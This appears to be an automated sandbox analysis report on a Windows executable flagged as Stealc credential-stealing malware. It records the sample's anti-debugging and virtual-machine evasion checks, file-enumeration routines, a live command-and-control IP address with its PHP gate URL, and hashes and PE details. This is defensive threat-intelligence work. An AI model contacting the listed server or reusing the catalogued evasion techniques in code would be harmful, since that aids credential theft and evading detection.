                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65DE7 second address: B65DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A80C second address: B6A816 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F374C500076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A816 second address: B6A81C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A81C second address: B6A820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302B6 second address: 53302BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302BB second address: 53302C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C1 second address: 53302C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C5 second address: 53302C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C9 second address: 5330313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c pushfd 0x0000000d jmp 00007F374CE66334h 0x00000012 or cx, E168h 0x00000017 jmp 00007F374CE6632Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F374CE66334h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303FF second address: 5330404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330404 second address: 5330409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8604D second address: A86051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E18C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A7E2C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B035F3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00694570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00693EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681160 GetSystemInfo,ExitProcess,0_2_00681160
                Source: file.exe, file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13574
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13559
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13562
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13613
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13582
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006845C0 VirtualProtect ?,00000004,00000100,000000000_2_006845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699750 mov eax, dword ptr fs:[00000030h]0_2_00699750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699600
                Source: file.exe, file.exe, 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: xXeProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00697B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00696920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00696920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00697A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe54%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpL17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php817%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpx17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php$17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpP17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpLfile.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37ofile.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpRxfile.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpPfile.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/Lxcqfile.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php8file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/e2b1563c6670f193.phpxfile.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/6122658-3693405117-2476756634-1002efile.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/UxZqfile.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/cxfile.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php$file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmptrueunknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1532364
                            Start date and time:2024-10-13 02:43:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948199345776722
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'812'992 bytes
                            MD5:fb664593a62eba5ceb677e19aedc1673
                            SHA1:aee5527070492aa7d1e7c93a3a806ba0ef8fab8c
                            SHA256:0d7cf91d5f474164b23946086b63538ccb1e4bf612e45e9556b2021574b26731
                            SHA512:9daa8fac60192325b864abab66fd336fb9780520cdd6d92e1ed3adaf0709c1c8fa3f244ed32d3f22a88b49196ed10f098df3a68edb547654b5e471b90bf20995
                            SSDEEP:49152:+mjNu5fveeWJOxlGWV6E+oW8zNzwRkdWQifYK5i:e3eeWJOG0+oW8zNzWBQ
                            TLSH:738533D48C39C2EEDC0548B1F5F6C61B34ADEC610EDAB279A52CC6B5923AF643006B5D
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xa8a000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F374CE79DFAh
                            js 00007F374CE79E11h
                            add byte ptr [eax], al
                            jmp 00007F374CE7BDF5h
                            add byte ptr [0000000Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], ch
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], bl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800a5ac66f4a874f117cd276a05d87a70cfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
